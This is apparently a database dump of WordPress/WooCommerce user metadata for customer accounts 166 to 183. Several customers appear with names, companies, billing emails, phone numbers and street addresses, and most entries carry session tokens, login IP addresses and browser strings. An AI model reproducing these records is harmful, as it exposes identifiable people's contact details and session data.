INSERT INTO `wp_usermeta` VALUES (3106, 166, '_yoast_wpseo_profile_updated', '1479226711'); 
INSERT INTO `wp_usermeta` VALUES (3107, 166, 'session_tokens', 'a:1:{s:64:"9fe1669381dc0da105454474b6c8d5b0de0b2bf4cf50102cbe4447a50ba8959a";a:4:{s:10:"expiration";i:1480436312;s:2:"ip";s:15:"104.205.218.239";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479226712;}}'); 
INSERT INTO `wp_usermeta` VALUES (3108, 166, 'billing_first_name', 'Steven'); 
INSERT INTO `wp_usermeta` VALUES (3109, 166, 'billing_last_name', 'Wood'); 
INSERT INTO `wp_usermeta` VALUES (3110, 166, 'billing_company', 'Wetaskiwin Air Services'); 
INSERT INTO `wp_usermeta` VALUES (3111, 166, 'billing_email', 'stevenw@absoluteaviaiton.ca'); 
INSERT INTO `wp_usermeta` VALUES (3112, 166, 'billing_phone', '7803525643'); 
INSERT INTO `wp_usermeta` VALUES (3113, 166, 'billing_country', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (3114, 166, 'billing_address_1', 'Box 6444'); 
INSERT INTO `wp_usermeta` VALUES (3115, 166, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3116, 166, 'billing_city', 'Wetaskiwin'); 
INSERT INTO `wp_usermeta` VALUES (3117, 166, 'billing_state', 'AB'); 
INSERT INTO `wp_usermeta` VALUES (3118, 166, 'billing_postcode', 'T9A 2G2'); 
INSERT INTO `wp_usermeta` VALUES (3119, 166, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3120, 167, 'nickname', 'beth.willey'); 
INSERT INTO `wp_usermeta` VALUES (3121, 167, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3122, 167, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3123, 167, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3124, 167, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3125, 167, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3126, 167, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3127, 167, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3128, 167, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3129, 167, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3130, 167, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3131, 167, '_yoast_wpseo_profile_updated', '1479229380'); 
INSERT INTO `wp_usermeta` VALUES (3132, 167, 'session_tokens', 'a:1:{s:64:"57633813886f78626f51257b70a396bc5d3a5f77efb96bb7f3ac446f5a1204f5";a:4:{s:10:"expiration";i:1480438981;s:2:"ip";s:13:"208.65.31.226";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479229381;}}'); 
INSERT INTO `wp_usermeta` VALUES (3133, 167, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3134, 168, 'nickname', 'onlyhxq'); 
INSERT INTO `wp_usermeta` VALUES (3135, 168, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3136, 168, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3137, 168, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3138, 168, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3139, 168, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3140, 168, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3141, 168, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3142, 168, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3143, 168, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3144, 168, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3145, 168, '_yoast_wpseo_profile_updated', '1479264489'); 
INSERT INTO `wp_usermeta` VALUES (3146, 168, 'session_tokens', 'a:1:{s:64:"deeba85312dd0076c83710f734dea5135bdf66f7a0d22dd5cac025fa3f504161";a:4:{s:10:"expiration";i:1480474090;s:2:"ip";s:11:"199.64.7.56";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1479264490;}}'); 
INSERT INTO `wp_usermeta` VALUES (3147, 168, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3148, 169, 'nickname', 'dtucker'); 
INSERT INTO `wp_usermeta` VALUES (3149, 169, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3150, 169, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3151, 169, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3152, 169, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3153, 169, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3154, 169, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3155, 169, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3156, 169, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3157, 169, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3158, 169, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3159, 169, '_yoast_wpseo_profile_updated', '1479307469'); 
INSERT INTO `wp_usermeta` VALUES (3160, 169, 'session_tokens', 'a:1:{s:64:"7c63db7a42e88b9402fd9ef92d63250c229d629e2233a627c54ffdd6cc3bd2ab";a:4:{s:10:"expiration";i:1481219845;s:2:"ip";s:12:"66.94.211.82";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1481047045;}}'); 
INSERT INTO `wp_usermeta` VALUES (3161, 169, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3162, 170, 'nickname', 'meadeja'); 
INSERT INTO `wp_usermeta` VALUES (3163, 170, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3164, 170, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3165, 170, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3166, 170, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3167, 170, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3168, 170, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3169, 170, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3170, 170, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3171, 170, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3172, 170, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3173, 170, '_yoast_wpseo_profile_updated', '1479307839'); 
INSERT INTO `wp_usermeta` VALUES (3174, 170, 'session_tokens', 'a:1:{s:64:"8f083c92e07a5efcf0d14cdc536be242e75fdd3ab86e686fdf491b8986bcc676";a:4:{s:10:"expiration";i:1480517440;s:2:"ip";s:14:"192.100.51.131";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36";s:5:"login";i:1479307840;}}'); 
INSERT INTO `wp_usermeta` VALUES (3175, 170, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3176, 171, 'nickname', 'jake'); 
INSERT INTO `wp_usermeta` VALUES (3177, 171, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3178, 171, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3179, 171, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3180, 171, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3181, 171, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3182, 171, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3183, 171, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3184, 171, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3185, 171, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3186, 171, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3187, 171, '_yoast_wpseo_profile_updated', '1479326615'); 
INSERT INTO `wp_usermeta` VALUES (3188, 171, 'session_tokens', 'a:1:{s:64:"ef9018a3f5e0e7104314d7289ab728c55d5b3910cdf844aab9263f65450004a7";a:4:{s:10:"expiration";i:1480536217;s:2:"ip";s:14:"209.160.200.35";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36";s:5:"login";i:1479326617;}}'); 
INSERT INTO `wp_usermeta` VALUES (3189, 172, 'nickname', 'parick.smith3'); 
INSERT INTO `wp_usermeta` VALUES (3190, 172, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3191, 172, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3192, 172, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3193, 172, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3194, 172, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3195, 172, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3196, 172, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3197, 172, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3198, 172, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3199, 172, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3200, 172, '_yoast_wpseo_profile_updated', '1479343863'); 
INSERT INTO `wp_usermeta` VALUES (3201, 172, 'session_tokens', 'a:1:{s:64:"0604c997c15596c7ffedaac2ef1cbb23d9a0ab7bdaa9ec3f12a21571fc6d4465";a:4:{s:10:"expiration";i:1480553464;s:2:"ip";s:10:"203.6.69.2";s:2:"ua";s:166:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)";s:5:"login";i:1479343864;}}'); 
INSERT INTO `wp_usermeta` VALUES (3202, 172, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3203, 173, 'nickname', 'juan.mollinedo'); 
INSERT INTO `wp_usermeta` VALUES (3204, 173, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3205, 173, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3206, 173, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3207, 173, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3208, 173, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3209, 173, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3210, 173, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3211, 173, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3212, 173, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3213, 173, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3214, 173, '_yoast_wpseo_profile_updated', '1479401377'); 
INSERT INTO `wp_usermeta` VALUES (3215, 173, 'session_tokens', 'a:1:{s:64:"ce6e624f05576a7c63a001836d295e82239174f6e67a7be9a4aceade60b23cf7";a:4:{s:10:"expiration";i:1480610978;s:2:"ip";s:12:"69.244.86.80";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1479401378;}}'); 
INSERT INTO `wp_usermeta` VALUES (3216, 173, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3217, 174, 'nickname', 'charley'); 
INSERT INTO `wp_usermeta` VALUES (3218, 174, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3219, 174, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3220, 174, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3221, 174, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3222, 174, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3223, 174, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3224, 174, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3225, 174, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3226, 174, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3227, 174, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3228, 174, '_yoast_wpseo_profile_updated', '1479402225'); 
INSERT INTO `wp_usermeta` VALUES (3229, 174, 'session_tokens', 'a:1:{s:64:"62bffd7f3c4588d36d991cdcc323a28f14570cd8d438793b263985c7b34be335";a:4:{s:10:"expiration";i:1480611826;s:2:"ip";s:12:"73.26.34.192";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0";s:5:"login";i:1479402226;}}'); 
INSERT INTO `wp_usermeta` VALUES (3230, 174, 'billing_first_name', 'Charley'); 
INSERT INTO `wp_usermeta` VALUES (3231, 174, 'billing_last_name', 'Robertson'); 
INSERT INTO `wp_usermeta` VALUES (3232, 174, 'billing_company', 'Score High Gunsmithing'); 
INSERT INTO `wp_usermeta` VALUES (3233, 174, 'billing_email', 'charley@scorehi.com'); 
INSERT INTO `wp_usermeta` VALUES (3234, 174, 'billing_phone', '800-326-5632'); 
INSERT INTO `wp_usermeta` VALUES (3235, 174, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (3236, 174, 'billing_address_1', '9812-A Cochiti Rd SE'); 
INSERT INTO `wp_usermeta` VALUES (3237, 174, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3238, 174, 'billing_city', 'Albuquerque'); 
INSERT INTO `wp_usermeta` VALUES (3239, 174, 'billing_state', 'NM'); 
INSERT INTO `wp_usermeta` VALUES (3240, 174, 'billing_postcode', '87123'); 
INSERT INTO `wp_usermeta` VALUES (3241, 174, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3242, 175, 'nickname', 'thomas.boslem'); 
INSERT INTO `wp_usermeta` VALUES (3243, 175, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3244, 175, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3245, 175, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3246, 175, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3247, 175, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3248, 175, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3249, 175, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3250, 175, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3251, 175, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3252, 175, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3253, 175, '_yoast_wpseo_profile_updated', '1479408540'); 
INSERT INTO `wp_usermeta` VALUES (3254, 175, 'session_tokens', 'a:1:{s:64:"28edfe6c580209b848ade4534728feaf54fd8c28860943350dd25445aa682d1b";a:4:{s:10:"expiration";i:1480618141;s:2:"ip";s:12:"138.163.0.41";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479408541;}}'); 
INSERT INTO `wp_usermeta` VALUES (3255, 175, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3256, 176, 'nickname', 'purchasing1'); 
INSERT INTO `wp_usermeta` VALUES (3257, 176, 'first_name', 'Rhonda'); 
INSERT INTO `wp_usermeta` VALUES (3258, 176, 'last_name', 'Rafferty'); 
INSERT INTO `wp_usermeta` VALUES (3259, 176, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3260, 176, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3261, 176, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3262, 176, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3263, 176, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3264, 176, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3265, 176, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3266, 176, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3267, 176, '_yoast_wpseo_profile_updated', '1479416054'); 
INSERT INTO `wp_usermeta` VALUES (3268, 176, 'session_tokens', 'a:1:{s:64:"4beb14117de93d3fab27649de052b9b8f921fd3dc25a7ae8855a54697a0152a3";a:4:{s:10:"expiration";i:1480625655;s:2:"ip";s:14:"75.144.170.201";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479416055;}}'); 
INSERT INTO `wp_usermeta` VALUES (3269, 176, 'last_update', '1479416368'); 
INSERT INTO `wp_usermeta` VALUES (3270, 176, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3271, 177, 'nickname', 'cory.rich'); 
INSERT INTO `wp_usermeta` VALUES (3272, 177, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3273, 177, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3274, 177, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3275, 177, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3276, 177, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3277, 177, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3278, 177, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3279, 177, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3280, 177, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3281, 177, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3282, 177, '_yoast_wpseo_profile_updated', '1479424526'); 
INSERT INTO `wp_usermeta` VALUES (3283, 177, 'session_tokens', 'a:1:{s:64:"256e0d85132cfefd316353c4858e491613762b8bc3ec78dd254cf790eff6f9e4";a:4:{s:10:"expiration";i:1480634127;s:2:"ip";s:13:"50.205.76.118";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36";s:5:"login";i:1479424527;}}'); 
INSERT INTO `wp_usermeta` VALUES (3284, 177, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3285, 178, 'nickname', 'matthew.d.danaher'); 
INSERT INTO `wp_usermeta` VALUES (3286, 178, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3287, 178, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3288, 178, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3289, 178, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3290, 178, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3291, 178, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3292, 178, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3293, 178, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3294, 178, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3295, 178, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3296, 178, '_yoast_wpseo_profile_updated', '1479500457'); 
INSERT INTO `wp_usermeta` VALUES (3297, 178, 'session_tokens', 'a:1:{s:64:"86dd0a2dc1af493970ddb34ec250c9c54cdd22e1cf088353a7ffc04cf601925b";a:4:{s:10:"expiration";i:1480710058;s:2:"ip";s:12:"130.76.24.11";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1479500458;}}'); 
INSERT INTO `wp_usermeta` VALUES (3298, 179, 'nickname', 'Charles.Sweetman'); 
INSERT INTO `wp_usermeta` VALUES (3299, 179, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3300, 179, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3301, 179, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3302, 179, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3303, 179, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3304, 179, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3305, 179, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3306, 179, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3307, 179, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3308, 179, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3309, 179, '_yoast_wpseo_profile_updated', '1479724255'); 
INSERT INTO `wp_usermeta` VALUES (3311, 179, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3312, 180, 'nickname', 'stacytaylor'); 
INSERT INTO `wp_usermeta` VALUES (3313, 180, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3314, 180, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3315, 180, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3316, 180, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3317, 180, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3318, 180, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3319, 180, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3320, 180, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3321, 180, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3322, 180, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3323, 180, '_yoast_wpseo_profile_updated', '1479740113'); 
INSERT INTO `wp_usermeta` VALUES (3324, 180, 'session_tokens', 'a:1:{s:64:"c475054a99cf0e5642deaf11912c77380c58ed710220673189e2be9adae037ab";a:4:{s:10:"expiration";i:1480949714;s:2:"ip";s:13:"141.189.251.1";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479740114;}}'); 
INSERT INTO `wp_usermeta` VALUES (3325, 180, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3326, 181, 'nickname', 'gary.boudreau'); 
INSERT INTO `wp_usermeta` VALUES (3327, 181, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3328, 181, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3329, 181, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3330, 181, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3331, 181, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3332, 181, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3333, 181, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3334, 181, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3335, 181, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3336, 181, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3337, 181, '_yoast_wpseo_profile_updated', '1479745787'); 
INSERT INTO `wp_usermeta` VALUES (3339, 181, 'billing_first_name', 'Gary'); 
INSERT INTO `wp_usermeta` VALUES (3340, 181, 'billing_last_name', 'Boudreau'); 
INSERT INTO `wp_usermeta` VALUES (3341, 181, 'billing_company', 'Newmont Mining'); 
INSERT INTO `wp_usermeta` VALUES (3342, 181, 'billing_email', 'gary.boudreau@newmont.com'); 
INSERT INTO `wp_usermeta` VALUES (3343, 181, 'billing_phone', '303-708-4280'); 
INSERT INTO `wp_usermeta` VALUES (3344, 181, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (3345, 181, 'billing_address_1', '357 inverness Drive South'); 
INSERT INTO `wp_usermeta` VALUES (3346, 181, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3347, 181, 'billing_city', 'Englewood'); 
INSERT INTO `wp_usermeta` VALUES (3348, 181, 'billing_state', 'CO'); 
INSERT INTO `wp_usermeta` VALUES (3349, 181, 'billing_postcode', '80112'); 
INSERT INTO `wp_usermeta` VALUES (3350, 181, 'session_tokens', 'a:1:{s:64:"bb4244609b9ed6a4dec2575c077aeaaa69fc28afe032e59898ee9329916c6a8d";a:4:{s:10:"expiration";i:1479918983;s:2:"ip";s:15:"108.171.132.164";s:2:"ua";s:62:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0;  rv:11.0) like Gecko";s:5:"login";i:1479746183;}}'); 
INSERT INTO `wp_usermeta` VALUES (3351, 181, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3352, 182, 'nickname', 'cannon.cims'); 
INSERT INTO `wp_usermeta` VALUES (3353, 182, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3354, 182, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3355, 182, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3356, 182, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3357, 182, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3358, 182, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3359, 182, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3360, 182, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3361, 182, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3362, 182, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3363, 182, '_yoast_wpseo_profile_updated', '1479747255'); 
INSERT INTO `wp_usermeta` VALUES (3364, 182, 'session_tokens', 'a:1:{s:64:"7dd34a36b867f9393f60460f449e458333108376e00fb2de50c751ae6bc71ef5";a:4:{s:10:"expiration";i:1480956856;s:2:"ip";s:14:"104.192.69.239";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1479747256;}}'); 
INSERT INTO `wp_usermeta` VALUES (3365, 182, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3366, 183, 'nickname', 'nicole.dean'); 
INSERT INTO `wp_usermeta` VALUES (3367, 183, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3368, 183, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3369, 183, 'description', ''); 
